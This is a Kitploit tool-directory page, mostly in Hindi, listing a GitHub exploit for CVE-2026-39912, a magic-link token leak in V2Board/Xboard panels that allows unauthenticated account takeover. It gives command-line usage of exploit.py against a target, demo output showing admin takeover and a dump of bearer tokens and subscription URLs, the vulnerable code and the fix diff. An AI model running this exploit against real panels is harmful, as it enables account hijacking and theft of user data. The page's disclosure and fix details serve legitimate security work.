Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-39912 — Xboard / V2Board अनधिकृत खाता अधिग्रहण - मैजिक लिंक टोकन रिसाव (CVE-2026-39912) | Kitploit
उपकरण/GitHubGitHub/chocapikk/cve-2026-39912
टोहीभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनापेनिट्रेशन टेस्टिंगप्रमाणीकरण
GitHubchocapikk/cve-2026-39912

CVE-2026-39912

Xboard / V2Board अनधिकृत खाता अधिग्रहण - मैजिक लिंक टोकन रिसाव (CVE-2026-39912)

रिपॉजिटरी देखें
215 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
वेबसाइट

CVE-2026-39912 - Xboard / V2Board बिना प्रमाणीकरण खाता अधिग्रहण

loginWithMailLink में मैजिक लिंक टोकन रिसाव

CVECVE-2026-39912
CVSS9.1 (गंभीर)
CWECWE-201 (भेजे गए डेटा में संवेदनशील जानकारी का समावेश)
प्रभावितV2Board >= 1.6.1 से 1.7.4 तक / Xboard के सभी संस्करण 0.1.9+ तक
फिक्सअभी नहीं (V2Board जून 2023 से परित्यक्त है)
खुलासा2026-04-09
श्रेयValentin Lobstein (Chocapikk)
विस्तृत विवरणchocapikk.com
फिक्स PRsV2Board #981 / Xboard #873

TL;DR

loginWithMailLink एंडपॉइंट मैजिक लॉगिन लिंक को केवल ईमेल के माध्यम से भेजने के बजाय सीधे HTTP प्रतिक्रिया बॉडी में लौटाता है। एक अनधिकृत हमलावर जो किसी पंजीकृत ईमेल को जानता है, वह दो HTTP अनुरोधों में किसी भी खाते — जिसमें एडमिन भी शामिल है — पर कब्ज़ा कर सकता है।

प्रभावित सॉफ़्टवेयर

  • V2Board - ओपन-सोर्स प्रॉक्सी प्रोटोकॉल प्रबंधन पैनल (8.7k स्टार, परित्यक्त)
  • Xboard - V2Board का फोर्क (4k+ स्टार, सक्रिय रूप से अनुरक्षित)

दोनों व्यापक रूप से तैनात VPN/प्रॉक्सी पैनल हैं, मुख्यतः चीन में। ZoomEye इंटरनेट पर 7,000+ उजागर इंस्टेंस दिखाता है।

आवश्यकताएँ

  • एडमिन सेटिंग्स में login_with_mail_link_enable सक्षम होना चाहिए (डिफ़ॉल्ट रूप से सक्षम नहीं है)
  • एक वैध पंजीकृत ईमेल पता

उपयोग

root@kitploit:~
# Install dependencies
pip install requests

# Account takeover + data dump
python3 exploit.py http://target:7001 [email protected]

# Save dump to file
python3 exploit.py http://target:7001 [email protected] -o dump.json

डेमो

root@kitploit:~
$ python3 exploit.py http://target:7001 [email protected]

 Xboard / V2Board - Unauth Account Takeover
 Magic Link Token Leak (CVE-2026-39912) | by Choc
 V2Board >= 1.6.1 | Xboard <= 0.1.9+
 45 min from git clone to is_admin: true

[INFO] Requesting magic link for [email protected]
[INFO] Leaked: http://target:7001/#/login?verify=267bdf61...&redirect=dashboard
[INFO] Authenticated (admin=True)
[INFO] User Info: OK
[INFO] Subscription: OK
[INFO] Active Sessions: OK
[INFO] Stats: OK

{
  "auth": {
    "auth_data": "Bearer qCU2d9hS...",
    "is_admin": true
  },
  "dump": {
    "User Info": {
      "email": "[email protected]",
      "uuid": "12fcb57d-e908-420e-a7aa-b5f7e7bd3695",
      ...
    },
    "Subscription": {
      "subscribe_url": "http://target:7001/s/324396af...",
      ...
    },
    "Active Sessions": [ ... ]
  }
}

बग

V2Board (app/Http/Controllers/Passport/AuthController.php):

root@kitploit:~
SendEmailJob::dispatch([...]);

return response([
    'data' => $link   // Token leaked to caller
]);

Xboard (app/Services/Auth/MailLinkService.php):

root@kitploit:~
$this->sendMailLinkEmail($user, $link);

return [true, $link]; // Same bug, inherited from fork

फिक्स

root@kitploit:~
- return [true, $link];
+ return [true, true];

संदर्भ

  • V2Board - असुरक्षित कोड (पंक्ति 71)
  • Xboard - असुरक्षित कोड (पंक्ति 49)
  • बग पेश करने वाला मूल कमिट (2022-06-27)
टूल डाउनलोड करें